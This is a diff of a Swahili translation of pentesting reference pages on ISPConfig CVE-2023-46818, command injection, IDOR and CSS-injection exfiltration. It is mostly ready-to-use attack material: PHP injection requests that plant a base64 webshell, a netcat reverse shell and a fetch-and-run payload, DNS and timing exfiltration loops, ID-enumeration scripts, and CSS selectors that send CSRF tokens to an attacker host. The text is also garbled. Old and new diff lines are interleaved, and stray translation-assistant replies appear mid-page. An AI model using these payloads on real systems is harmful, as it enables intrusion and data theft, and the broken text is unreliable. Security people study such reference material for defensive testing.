Angalia [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), imeandikwa na [Phith0n](https://x.com/phithon_xg) kwa maelezo ya mbinu hii.
## Marejeo

46
src/network-services-pentesting/pentesting-web/ispconfig.md
View File

@ -4,36 +4,36 @@
## Muhtasari
ISPConfig ni paneli ya usimamizi wa hosting yenye chanzo wazi. Mjenzi wa zamani wa 3.2.x uliweka kipengele cha mhariri wa faili za lugha ambacho, kitakapoamilishwa kwa msimamizi mkuu, kiliruhusu kuingizwa kwa msimbo wa PHP wa hiari kupitia rekodi ya tafsiri iliyoharibika. Hii inaweza kusababisha RCE katika muktadha wa web server na, kulingana na jinsi PHP inavyotekelezwa, kuongezeka kwa ruhusa.
ISPConfig ni paneli ya udhibiti ya hosting ya chanzo wazi. Toleo la zamani la 3.2.x lilijumuisha kipengele cha mhariri wa faili za lugha ambacho, kinapowezeshwa kwa msimamizi mkuu, kiliruhusu arbitrary PHP code injection kupitia rekodi ya tafsiri iliyoharibika. Hii inaweza kutoa RCE katika muktadha wa seva ya wavuti na, kulingana na jinsi PHP inavyotekelezwa, privilege escalation.
Njia za default muhimu:
- Web root mara nyingi iko katika `/var/www/ispconfig` inapohudumiwa na `php -S` au kupitia Apache/nginx.
- Admin UI inapatikana kwenye HTTP(S) vhost (wakati mwingine imefungwa kwa localhost tu; tumia SSH port-forward ikiwa inahitajika).
Njia za msingi za default:
- Mizizi ya wavuti mara nyingi iko kwenye `/var/www/ispconfig` wakati inahudumiwa na `php -S` au kupitia Apache/nginx.
- Admin UI inapatikana kwenye HTTP(S) vhost (mara nyingine imefungwa kwa localhost tu; tumia SSH port-forward ikiwa inahitajika).
Kidokezo: Ikiwa paneli imefungwa kwa ndani (mfano `127.0.0.1:8080`), iforward:
Vidokezo: Ikiwa paneli imefungwa kwa ndani (mfano `127.0.0.1:8080`), itengeneze port-forward:
```bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
```
## Mhariri wa lugha PHP code injection (CVE-2023-46818)
- Waliathirika: ISPConfig hadi 3.2.11 (fixed in 3.2.11p1)
- Imeathiriwa: ISPConfig hadi 3.2.11 (suluhisho limewekwa katika 3.2.11p1)
- Masharti ya awali:
- Ingia kama akaunti ya superadmin iliyojengwa ndani `admin` (mawadhifa/majukumu mengine hayahusiki kulingana na muuzaji)
- Ingia kama akaunti ya built-in superadmin `admin` (majukumu mengine hayagusiwi kulingana na muuzaji)
- Mhariri wa lugha lazima uwe umewezeshwa: `admin_allow_langedit=yes` katika `/usr/local/ispconfig/security/security_settings.ini`
- Athari: Admin aliethibitishwa anaweza kuingiza PHP yoyote inayohifadhiwa kwenye faili la lugha na kutekelezwa na programu, akipata RCE katika muktadha wa wavuti
- Athari: Admin aliye na uthibitisho anaweza kuingiza PHP yoyote inayotumwa ndani ya faili ya lugha na kutekelezwa na application, akipata RCE katika muktadha wa wavuti
Marejeo: NVD entry CVE-2023-46818 na kiungo cha ushauri cha muuzaji katika sehemu ya Marejeo hapa chini.
References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.
### Manual exploitation flow
### Mtiririko wa exploitation kwa mkono
1) Fungua/unda faili la lugha ili kupata tokeni za CSRF
1) Open/create a language file to obtain CSRF tokens
Tuma POST ya kwanza ili kuanzisha fomu na kuchambua viwanja vya CSRF kutoka kwenye majibu ya HTML (`csrf_id`, `csrf_key`). Mfano wa njia ya ombi: `/admin/language_edit.php`.
Tuma POST ya kwanza ili kuanzisha fomu na uchambue maeneo ya CSRF kutoka kwenye jibu la HTML (`csrf_id`, `csrf_key`). Mfano wa request path: `/admin/language_edit.php`.
2) Inject PHP via records[] and save
Tuma POST ya pili ikijumuisha viwanja vya CSRF na rekodi ya tafsiri hatarishi. Minimal command-execution probes:
Wasilisha POST ya pili ikiwa ni pamoja na nywanja za CSRF na rekodi ya tafsiri yenye maudhui mabaya. Minimal command-execution probes:
```http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
@ -42,13 +42,13 @@ Cookie: ispconfig_auth=...
lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
```
Mtihani wa Out-of-band (angalia ICMP):
Out-of-band test (angalia ICMP):
```http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
```
3) Andika faili na weke webshell
3) Andika faili na uweke webshell
Tumia `file_put_contents` kuunda faili ndani ya path inayoweza kufikiwa kupitia wavuti (mfano, `admin/`):
Tumia `file_put_contents` kuunda faili chini ya njia inayofikiwa kupitia wavuti (kwa mfano, `admin/`):
```http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
```
@ -56,30 +56,30 @@ Kisha andika webshell rahisi ukitumia base64 ili kuepuka herufi mbaya katika mwi
```http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
```
I don't have the file contents. Please paste the markdown from src/network-services-pentesting/pentesting-web/ispconfig.md (or attach it) and I will translate the relevant English text to Swahili following your rules.
I don't have the file contents. Please paste the markdown from src/network-services-pentesting/pentesting-web/ispconfig.md here (or paste the portion you want translated). I'll translate the English text to Swahili, keeping all code, tags, links, paths and specified technical names unchanged.
```bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
```
Ikiwa PHP inaendeshwa kama root (kwa mfano, kupitia `php -S 127.0.0.1:8080` iliyoanzishwa na root), hii inatoa RCE ya root mara moja. Vinginevyo, unapata utekelezaji wa msimbo kama mtumiaji wa server ya wavuti.
Ikiwa PHP inatekelezwa kama root (kwa mfano, kupitia `php -S 127.0.0.1:8080` iliyoanzishwa na root), hii husababisha root RCE mara moja. Vinginevyo, unapata utekelezaji wa msimbo kama mtumiaji wa seva ya wavuti.
### Python PoC
Exploit tayari kwa kutumia huotomatiza kushughulikia token na kusambaza payload:
Exploit tayari-kutumika huendesha kiotomatiki utunzaji wa token na utoaji wa payload:
- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
Mfano wa utekelezaji:
```bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
```
### Kuimarisha usalama
### Hardening
- Sasisha hadi 3.2.11p1 au baadaye
- Zima mhariri wa lugha isipokuwa ikihitajika kabisa:
- Zima mhariri wa lugha isipokuwa inahitajika kabisa:
```
admin_allow_langedit=no
```
- Epuka kuendesha paneli kama root; sanidi PHP-FPM au web server ili kupunguza idhini za ufikiaji
- Lazimisha uthibitishaji imara kwa akaunti ya `admin` iliyojengwa
- Epuka kuendesha paneli kama root; sanidi PHP-FPM au server ya wavuti ili kupunguza vibali
- Lazimisha uthibitishaji imara kwa akaunti ya ndani `admin`
## Marejeo

30
src/pentesting-web/command-injection.md
View File

@ -2,13 +2,13 @@
{{#include ../banners/hacktricks-training.md}}
## Je, Command Injection ni nini?
## Command Injection ni nini?
A **command injection** inaruhusu utekelezaji wa amri yoyote za mfumo wa uendeshaji na mshambuliaji kwenye server inayohifadhi application. Kwa matokeo, application na data zake zote zinaweza kuathiriwa/kufauliwa kabisa. Utekelezaji wa amri hizi kwa kawaida huwapa mshambuliaji ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi.
A **command injection** inaruhusu mshambulizi kutekeleza amri zozote za mfumo wa uendeshaji kwenye server inayohifadhi programu. Kwa hivyo, programu pamoja na data zake zote zinaweza kuathirika kabisa. Kutekelezwa kwa amri hizi kwa kawaida humruhusu mshambulizi kupata upatikanaji usioidhinishwa au kudhibiti mazingira ya programu na mfumo wa msingi.
### Muktadha
Kulingana na **wapi ingizo lako linaingizwa** unaweza kuhitaji **kumaliza muktadha uliowekwa kwa nukuu** (ukitumia `"` au `'`) kabla ya amri.
Kutegemea **ambapo pembejeo yako inaingizwa**, unaweza kuhitaji **kumaliza muktadha ulioko ndani ya nukuu** (kwa kutumia `"` au `'`) kabla ya kuingiza amri.
## Command Injection/Execution
```bash
@ -30,9 +30,9 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
```
### **Limition** Bypasses
### **Vikwazo** Bypasses
Ikiwa unajaribu kutekeleza **amri za hiari ndani ya mashine ya linux** utapendezwa kusoma kuhusu haya **Bypasses:**
Ikiwa unajaribu kutekeleza **arbitrary commands inside a linux machine** utavutiwa kusoma kuhusu haya **Bypasses:**
{{#ref}}
@ -45,9 +45,9 @@ vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
```
### Parameters
### Vigezo
Hapa kuna vigezo 25 vya juu vinavyoweza kuwa nyeti kwa code injection na RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):
Hapa ni vigezo 25 vya juu ambavyo vinaweza kuwa hatarini kwa code injection na udhaifu wa RCE zinazofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)):
```
?cmd={payload}
?exec={payload}
@ -77,7 +77,7 @@ Hapa kuna vigezo 25 vya juu vinavyoweza kuwa nyeti kwa code injection na RCE vul
```
### Time based data exfiltration
Kuchota data: herufi kwa herufi
Kutoa data: herufi kwa herufi
```
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
@ -91,7 +91,7 @@ sys 0m0.000s
```
### DNS based data exfiltration
Imetegemea tool kutoka `https://github.com/HoLyVieR/dnsbin` pia inayoendeshwa kwenye dnsbin.zhack.ca
Inategemea zana kutoka `https://github.com/HoLyVieR/dnsbin` pia iliyohifadhiwa kwenye dnsbin.zhack.ca
```
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
@ -101,7 +101,7 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
Zana za mtandaoni za kuangalia DNS based data exfiltration:
Zana mtandaoni za kuangalia DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
@ -122,7 +122,7 @@ powershell C:**2\n??e*d.*? # notepad
### Node.js `child_process.exec` vs `execFile`
Unapofanya ukaguzi wa JavaScript/TypeScript back-ends, mara nyingi utakutana na Node.js `child_process` API.
Unapofanya ukaguzi wa back-ends za JavaScript/TypeScript, mara nyingi utakutana na Node.js `child_process` API.
```javascript
// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
@ -130,9 +130,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay
/* … */
});
```
`exec()` huanzisha **shell** (`/bin/sh -c`), hivyo alama yoyote inayokuwa na maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa katika msururu wa herufi.
`exec()` inazindua **shell** (`/bin/sh -c`), kwa hivyo karakteri yoyote ambayo ina maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa kwenye string.
**Kupunguza hatari:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na toa **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusishwe:
**Kupunguza hatari:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila argument kama kipengele tofauti cha array** ili shell isihusishwe:
```javascript
const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
@ -140,9 +140,9 @@ execFile('/usr/bin/do-something', [
'--payload', JSON.stringify(payload)
]);
```
Kisa cha ulimwengu halisi: *Synology Photos* ≤ 1.7.0-0794 kilikuwa kinaweza kutumika kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye ilingizwa katika wito la `exec()`, ikipelekea RCE (Pwn2Own Ireland 2024).
Kesi halisi: *Synology Photos* ≤ 1.7.0-0794 ilikuwa na udhaifu kupitia tukio la WebSocket lisilothibitishwa ambalo liliweka data iliyodhibitiwa na mshambuliaji kwenye `id_user`, ambayo baadaye iliingizwa katika wito la `exec()`, ikifanikisha RCE (Pwn2Own Ireland 2024).
## Orodha ya Ugunduzi wa Brute-Force
## Orodha ya Ugunduzi ya Brute-Force
{{#ref}}

62
src/pentesting-web/idor.md
View File

@ -2,23 +2,23 @@
{{#include ../banners/hacktricks-training.md}}
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) hujitokeza wakati endpoint ya web au API inaonyesha au inakubali kitambulisho kinachoweza kudhibitiwa na mtumiaji ambacho kinatumika **moja kwa moja** kufikia kitu cha ndani **bila kuthibitisha kwamba aliyeita ana idhini** ya kufikia/kuhariri kitu hicho.
Utekelezaji unaofanikiwa kwa kawaida unaruhusu kuongezeka kwa mamlaka kwa njia ya horizontal au vertical, kama kusoma au kuhariri data za watumiaji wengine na, katika kesi mbaya kabisa, kunyongwa udhibiti wa akaunti au kutoa data kwa wingi.
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) hutokea wakati endpoint ya wavuti au API inafichua au inakubali kitambulisho kinachosimamiwa na mtumiaji kinachotumika **moja kwa moja** kufikia object ya ndani **bila kuthibitisha kwamba mtumiaji anayetoa ombi ana ruhusa** ya kufikia/kuhariri object hiyo.
Matumizi ya mafanikio kawaida huruhusu horizontal au vertical privilege-escalation, kama kusoma au kubadilisha data za watumiaji wengine na, katika kesi mbaya kabisa, full account takeover au mass-data exfiltration.
---
## 1. Kutambua IDOR Zinaoweza Kutokea
## 1. Kutambua IDOR Zenyewezekano
1. Tafuta **vigezo vinavyorejea kitu**:
1. Tafuta **vigezo vinavyorejea object**:
* Path: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
* Query: `?id=42`, `?invoice=2024-00001`
* Body / JSON: `{"user_id": 321, "order_id": 987}`
* Headers / Cookies: `X-Client-ID: 4711`
2. Pendelea endpoints zinazofanya **kusoma au kusasisha** data (`GET`, `PUT`, `PATCH`, `DELETE`).
3. Tambua wakati vitambulisho ni **mfuatano au vinavyoweza kutabirika** kama ID yako ni `64185742`, basi `64185741` huenda ipo.
4. Chunguza njia zilizofichwa au mbadala (mfano *"Paradox team members"* link katika kurasa za kuingia) ambazo zinaweza kufichua API za ziada.
5. Tumia kikao chenye **uthibitishaji kilicho na ruhusa ndogo** na ubadilishe tu ID huku **ukiendelea kutumia token/cookie ile ile**. Kukosekana kwa kosa la idhini kwa kawaida ni dalili ya IDOR.
3. Tambua wakati vitambulisho ni **mfululizo au vinavyoweza kutabirika** ikiwa ID yako ni `64185742`, basi `64185741` pengine ipo.
4. Chunguza njia zilizofichika au mbadala (mfano *"Paradox team members"* link kwenye kurasa za kuingia) ambazo zinaweza kufichua API za ziada.
5. Tumia kikao kilicho **thibitishwa chenye ruhusa ndogo** na badilisha tu ID huku **ukibakisha token/cookie ile ile**. Kutokuwepo kwa kosa la authorization kawaida ni dalili ya IDOR.
### Quick manual tampering (Burp Repeater)
### Kuibadilisha kwa mkono kwa haraka (Burp Repeater)
```
PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
@ -27,7 +27,7 @@ Content-Type: application/json
{"lead_id":64185741}
```
### Orodhesho otomatiki (Burp Intruder / curl loop)
### Uorodheshaji uliootomatishwa (Burp Intruder / curl loop)
```bash
for id in $(seq 64185742 64185700); do
curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
@ -38,33 +38,33 @@ done
```
---
### Oracle ya majibu ya makosa kwa user/file enumeration
### Error-response oracle for user/file enumeration
Wakati endpoint ya download inakubali username na filename (mfano `/view.php?username=<u>&file=<f>`), tofauti ndogo katika ujumbe za makosa mara nyingi huunda oracle:
Wakati download endpoint inakubali username na filename (mfano `/view.php?username=<u>&file=<f>`), tofauti ndogo katika error messages mara nyingi huunda oracle:
- Jina la mtumiaji lisilopo → "User not found"
- Username isiyokuwepo → "User not found"
- Filename mbaya lakini extension halali → "File does not exist" (mara nyingine pia huorodhesha available files)
- Extension mbaya → validation error
Kwa kikao chochote kilichothibitishwa, unaweza fuzz parameter ya username huku ukishikilia filename ya kawaida na kuchuja kwa string "user not found" ili kugundua watumiaji halali:
Kwa authenticated session yoyote, unaweza fuzz parameter ya username huku ukitumia benign filename na kuchuja kwa string "user not found" ili kugundua watumiaji halali:
```bash
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'
```
Mara tu majina halali ya watumiaji yanapotambuliwa, omba faili maalumu moja kwa moja (kwa mfano, `/view.php?username=amanda&file=privacy.odt`). Muundo huu kwa kawaida husababisha ufunuliwa bila idhini wa nyaraka za watumiaji wengine na uvuaji wa credentials.
Mara tu majina halali ya watumiaji yanapotambuliwa, omba faili maalum moja kwa moja (mfano, `/view.php?username=amanda&file=privacy.odt`). Mfumo huu mara nyingi husababisha ufunuo usioidhinishwa wa nyaraka za watumiaji wengine na credential leakage.
---
## 2. Mfano wa Kesi Halisi McHire Chatbot Platform (2025)
## 2. Mfano wa Kesi wa Maisha Halisi **McHire** Chatbot Platform (2025)
Wakati wa tathmini ya portal ya ajira ya **McHire** inayotumia Paradox.ai, IDOR ifuatayo iligunduliwa:
Wakati wa tathmini ya portal ya uajiri ya Paradox.ai-powered **McHire**, IDOR ifuatayo iligunduliwa:
* Endpoint: `PUT /api/lead/cem-xhr`
* Authorization: cookie ya session ya mtumiaji kwa **any** akaunti ya mtihani ya mgahawa
* Body parameter: `{"lead_id": N}` kitambulisho cha nambari cha tarakimu 8, **mfuatano**
* Authorization: cookie ya kikao cha mtumiaji kwa akaunti ya mtihani ya mgahawa **yoyote**
* Body parameter: `{"lead_id": N}` kitambulisho la nambari lenye tarakimu 8, **mfululizo**
Kwa kupunguza `lead_id`, mtahasi alipata PII kamili za waombaji (jina, e-mail, simu, anwani, mapendeleo ya zamu) pamoja na JWT ya mteja iliyoruhusu session hijacking. Kuorodhesha anuwai `1 64,185,742` kulifunua takriban **64 million** rekodi.
Kwa kupunguza `lead_id` mjaribu alipata PII kamili ya waombaji (jina, barua pepe, nambari ya simu, anwani, mapendeleo ya zamu) pamoja na JWT ya mteja ambayo iliruhusu kuiba kikao. Uorodhesha wa mfululizo `1 64,185,742` ulifunua takriban **64 million** rekodi.
Proof-of-Concept request:
```bash
@ -76,19 +76,19 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
---
## 3. Athari za IDOR / BOLA
* Kupanda kwa usawa kusoma/kuhariri/kufuta **data za watumiaji wengine**.
* Kupanda kwa wima mtumiaji mwenye vibali vidogo anapata utendakazi unaotengwa kwa admin pekee.
* Uvujaji mkubwa wa data ikiwa vitenambulisho ni mfululizo (mfano: vitambulisho vya waombaji, ankara).
* Uchukuzi wa akaunti kwa kuiba tokens au kwa kuweka upya nywila za watumiaji wengine.
* Ukuaji wa usawa soma/rekebisha/futa data za **watumiaji wengine**.
* Ukuaji wa wima mtumiaji mwenye ruhusa ndogo anapata kazi zinazotumika tu kwa admin.
* Uvunjaji mkubwa wa data ikiwa vitambulisho viko kwa msururu (mfano, applicant IDs, invoices).
* Kunyakuliwa kwa akaunti kwa kuiba tokens au kuweka upya nywila za watumiaji wengine.
---
## 4. Uzuiaji & Mbinu Bora
1. **Lazimisha idhinishaji kwa kiwango cha kipengee** kwenye kila ombi (`user_id == session.user`).
2. Pendelea **vitenambulisho visivyo vya moja kwa moja, visivyoweza kubahatishwa** (UUIDv4, ULID) badala ya auto-increment IDs.
3. Fanya idhinishaji upande wa server (server-side), usitegemee maeneo ya fomu yaliyofichwa au controls za UI.
4. Tekeleza ukaguzi wa **RBAC / ABAC** katika middleware ya kati.
5. Ongeza **rate-limiting & logging** kugundua uorodheshaji wa IDs.
6. Testi kiusalama kila endpoint mpya (unit, integration, na DAST).
## 4. Uzuiaji na Mbinu Bora
1. **Lazimisha object-level authorization** kwenye kila ombi (`user_id == session.user`).
2. Tumia **indirect, unguessable identifiers** (UUIDv4, ULID) badala ya auto-increment IDs.
3. Fanya authorization upande wa server, usitegemee hidden form fields au UI controls.
4. Tekeleza **RBAC / ABAC** checks kwenye middleware ya kati.
5. Ongeza **rate-limiting & logging** ili kugundua enumeration ya IDs.
6. Fanya security test kwa kila endpoint mpya (unit, integration, na DAST).
---
## 5. Zana
@ -98,7 +98,7 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
## Marejeo
## References
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)

200
src/pentesting-web/xs-search/css-injection/README.md
View File

@ -6,7 +6,7 @@
### Attribute Selector
CSS selectors zimeundwa ili zifananishe thamani za sifa `name` na `value` za kipengee cha `input`. Ikiwa sifa ya `value` ya elementi ya `input` inaanza na alama maalum, rasilimali ya nje iliyotanguliwa itapakiwa:
Selectors za CSS zimeundwa ili kufanana na thamani za atributi za `name` na `value` za kipengee cha `input`. Iwapo atributi ya `value` ya kipengee cha `input` inaanza na alama maalum, rasilimali ya nje iliyobainishwa itapakiwa:
```css
input[name="csrf"][value^="a"] {
background-image: url(https://attacker.com/exfil/a);
@ -19,30 +19,30 @@ input[name="csrf"][value^="9"] {
background-image: url(https://attacker.com/exfil/9);
}
```
Hata hivyo, mbinu hii inakutana na kizuizi linapohusika na elementi za input zilizofichwa (`type="hidden"`) kwa sababu elementi zilizofichwa hazipaki backgrounds.
Hata hivyo, mbinu hii inakutana na kikomo inaposhughulika na elementi za input zilizofichwa (`type="hidden"`) kwa sababu elementi zilizofichwa hazipakia background.
#### Bypass kwa Elementi Zilizofichwa
#### Kukwepa kwa Elementi Zilizofichwa
Ili kuepuka kizuizi hiki, unaweza kulenga elementi ya sibling inayofuata kwa kutumia `~` general sibling combinator. Kisha sheria ya CSS itumike kwa siblings wote wanaofuata elementi ya input iliyofichwa, na kusababisha picha ya background kupakia:
Ili kuepuka kikomo hiki, unaweza kulenga elementi ndugu inayofuata ukitumia `~` general sibling combinator. Kisha kanuni ya CSS itatumika kwa ndugu zote zinazofuata elementi ya input iliyofichwa, na kusababisha picha ya background kupakia:
```css
input[name="csrf"][value^="csrF"] ~ * {
background-image: url(https://attacker.com/exfil/csrF);
}
```
Mfano wa vitendo wa kutumia mbinu hii umefafanuliwa kwa undani katika kipande cha msimbo kilichotolewa. Unaweza kuiona [here](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e).
Mfano wa vitendo wa kutumia tekniki hii umefafanuliwa kwa undani katika kipande cha msimbo kilichotolewa. Unaweza kuiona [hapa](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e).
#### Mahitaji ya CSS Injection
#### Masharti ya CSS Injection
Ili mbinu ya CSS Injection iwe na ufanisi, masharti fulani yanapaswa kutimizwa:
Ili tekniki ya CSS Injection ifanye kazi kwa ufanisi, masharti fulani yanapaswa kutimizwa:
1. **Payload Length**: vektori ya CSS injection inapaswa kuunga mkono payloads za urefu wa kutosha ili kuweza kubeba selectors zilizotengenezwa.
2. **CSS Re-evaluation**: Unapaswa kuwa na uwezo wa kuweka ukurasa ndani ya iframe, jambo muhimu ili kusababisha CSS itathminwe upya kwa payloads mpya zilizotengenezwa.
3. **External Resources**: Mbinu hii inategemea uwezo wa kutumia picha zilizohostwa kwa nje. Hii inaweza kuzuiliwa na Content Security Policy (CSP) ya tovuti.
1. **Payload Length**: Vector ya CSS injection inapaswa kuunga mkono payloads zenye urefu wa kutosha ili kuweza kushikilia selectors zilizotengenezwa.
2. **CSS Re-evaluation**: Unapaswa kuwa na uwezo wa kuframesha ukurasa, jambo muhimu ili kusababisha upya tathmini ya CSS na payloads mpya zilizotengenezwa.
3. **External Resources**: Tekniki inadhani uwezekano wa kutumia picha zilizo hifadhiwa nje. Hii inaweza kukataliwa na Content Security Policy (CSP) ya tovuti.
### Blind Attribute Selector
As [**explained in this post**](https://portswigger.net/research/blind-css-exfiltration), it's possible to combine the selectors **`:has`** and **`:not`** to identify content even from blind elements. Hii ni muhimu sana unapokuwa huna wazo lolote kuhusu kile kilicho ndani ya ukurasa wa wavuti unaopakia CSS injection.\
Pia inawezekana kutumia selectors hizo kuchukua taarifa kutoka kwa vibloki kadhaa vya aina ile ile kama ilivyo katika:
Kama [**ilivyofafanuliwa katika chapisho hili**](https://portswigger.net/research/blind-css-exfiltration), inawezekana kuunganisha selectors **`:has`** na **`:not`** ili kutambua yaliyomo hata kutoka kwa elementi zisizoonekana. Hii ni muhimu sana unapokosa taarifa kuhusu kile kilicho ndani ya ukurasa unaolakiwa na CSS injection.\
Pia inawezekana kutumia selectors hizo kutoa taarifa kutoka kwa vibloki vingi vya aina hiyo kama inavyoonekana katika:
```html
<style>
html:has(input[name^="m"]):not(input[name="mytoken"]) {
@ -52,34 +52,34 @@ background: url(/m);
<input name="mytoken" value="1337" />
<input name="myname" value="gareth" />
```
Kuunganisha hii na mbinu ifuatayo ya **@import**, inawezekana ku-exfiltrate kiasi kikubwa cha **info using CSS injection from blind pages with** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.
Combining this with the following **@import** technique, it's possible to exfiltrate a lot of **info using CSS injection from blind pages with** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**
### @import
Mbinu ya awali ina mapungufu kadhaa, angalia prerequisites. Unahitaji kuwa na uwezo wa **send multiple links to the victim**, au unahitaji kuwa na uwezo wa **iframe the CSS injection vulnerable page**.
Mbinu iliyotangulia ina mapungufu fulani, angalia vigezo vinavyohitajika. Lazima uweze ama **send multiple links to the victim**, au uweze **iframe the CSS injection vulnerable page**.
Walakini, kuna mbinu nyingine mahiri inayotumia **CSS `@import`** kuboresha ubora wa mbinu hiyo.
Hata hivyo, kuna mbinu nyingine mwerevu inayotumia **CSS `@import`** kuboresha ubora wa mbinu hii.
Hii ilionyeshwa kwa mara ya kwanza na [**Pepe Vila**](https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf) na inafanya kazi kama ifuatavyo:
Hii ilionyeshwa kwa mara ya kwanza na [**Pepe Vila**](https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf) na inafanya kazi hivi:
Badala ya kupakia ukurasa uleule mara kwa mara na makumi ya payloads tofauti kila wakati (kama ilivyokuwa hapo awali), tutapakia **load the page just once and just with an import to the attackers server** (hii ni payload ya kumtumia victim):
Badala ya kupakia ukurasa uleule tena na tena na tens za payloads tofauti kila mara (kama katika iliyotangulia), tutapakia ukurasa mara moja tu na tu na **load the page just once and just with an import to the attackers server** (this is the payload to send to the victim):
```css
@import url("//attacker.com:5001/start?");
```
1. The import is going to **pokea script ya CSS** kutoka kwa attackers na **kivinjari kitaipakia**.
2. The first part of the CSS script the attacker will send is **another `@import` to the attackers server again.**
1. The attackers server won't respond this request yet, as we want to leak some chars and then respond this import with the payload to leak the next ones.
3. The second and bigger part of the payload is going to be an **attribute selector leakage payload**
1. This will send to the attackers server the **first char of the secret and the last one**
4. Once the attackers server has received the **first and last char of the secret**, it will **respond the import requested in the step 2**.
1. The response is going to be exactly the same as the **steps 2, 3 and 4**, but this time it will try to **find the second char of the secret and then penultimate**.
1. Import itapokea **script ya CSS** kutoka kwa mshambuliaji na **kivinjari kitapakia**.
2. Sehemu ya kwanza ya script ya CSS ambayo mshambuliaji atatumia ni **another `@import` to the attackers server again.**
1. Server ya mshambuliaji haitajibu ombi hili bado, kwa sababu tunataka leak baadhi ya herufi kisha kujibu import hii kwa payload ili leak herufi zinazofuata.
3. Sehemu ya pili na kubwa ya payload itakuwa **attribute selector leakage payload**
1. Hii itatuma kwa server ya mshambuliaji **herufi ya kwanza ya siri na ile ya mwisho**
4. Mara server ya mshambuliaji itakapopokea **herufi ya kwanza na ya mwisho ya siri**, itatajima/jibu import iliyohitajika katika hatua 2.
1. Majibu yatakuwa sawa kabisa na **steps 2, 3 and 4**, lakini mara hii itajaribu **kutafuta herufi ya pili ya siri kisha ile ya kabla ya mwisho**.
Mshambuliaji ata f**uata mzunguko huo hadi itakapofaulu leak kabisa the secret**.
Mshambuliaji ata f**uata mzunguko huo hadi ipate leak kabisa ya siri**.
You can find the original [**Pepe Vila's code to exploit this here**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) or you can find almost the [**same code but commented here**.](#css-injection)
> [!TIP]
> The script will try to discover 2 chars each time (from the beginning and from the end) because the attribute selector allows to do things like:
> Script ita jaribu kugundua herufi 2 kila mara (kutoka mwanzo na kutoka mwishoni) kwa sababu attribute selector inaruhusu kufanya vitu kama:
>
> ```css
> /* value^= to match the beggining of the value*/
@ -93,45 +93,45 @@ You can find the original [**Pepe Vila's code to exploit this here**](https://gi
> }
> ```
>
> This allows the script to leak the secret faster.
> Hii inaruhusu script kufanya leak ya siri kwa haraka zaidi.
> [!WARNING]
> Wakati mwingine script **haitambui kwa usahihi kwamba prefix + suffix zilizogunduliwa tayari ni flag kamili** na itaendelea mbele (katika prefix) na nyuma (katika suffix) na kwa wakati fulani itaishia kusimamika.\
> Usihofu, angalia tu **output** kwa sababu **unaweza kuona flag pale**.
